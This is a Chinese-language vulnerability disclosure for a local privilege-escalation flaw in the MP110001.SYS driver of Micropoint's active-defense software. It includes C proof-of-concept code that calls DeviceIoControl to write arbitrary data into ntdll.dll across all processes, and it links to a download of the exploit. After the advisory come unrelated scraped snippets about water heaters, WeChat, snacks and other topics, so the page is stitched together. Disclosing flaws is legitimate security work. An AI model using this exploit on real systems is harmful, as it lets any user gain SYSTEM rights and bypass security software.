微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
本文导读目录: 1、卡萨帝CEH236热水器怎么调水温 2、oscp通过人数 3、CEH_60ART3KUI参数 4、IIETPOBCKIN CEHATB注册过商标吗?还有哪些分类可以注册...
个人对微信不是很来电,对于一个自媒体人,对微信没兴趣这是一件非常失败的事情,但是却在微信上有很大的天赋,貌似随便发点垃圾内容,转发、点赞、打赏的人却非常多,试着帮助过几个企业做微信营销,得到的口碑都还...
范渊两次登上黑帽大会讲台,为奥运、世博建“铜墙铁壁” 人物简介 范渊,1975年生于浙江,美国圣何塞加州州立大学计算机科学硕士,2007年回国创业。曾参与2008年北京奥运会,2010年上海世博会...
近日有一些小伙伴们资询我有关支付宝钱包薪水个税计算器怎么使用呢?下边就为大伙儿产生了支付宝钱包薪水个税计算器操作方法,有必须的小伙伴们能够 来掌握掌握哦。 近日有一些小伙伴们资询我有关支付...
. 夏天的西瓜和饮料格外诱人,2020疫情的影响不适合过多的外出和聚集,选择一些零食渡过也是不错的选择,吃着零食吹着空调他不香吗,适合夏天吃的零食有哪些?适合2020夏天吃的零食,下面带来介绍。...
TVB颁奖入围名单...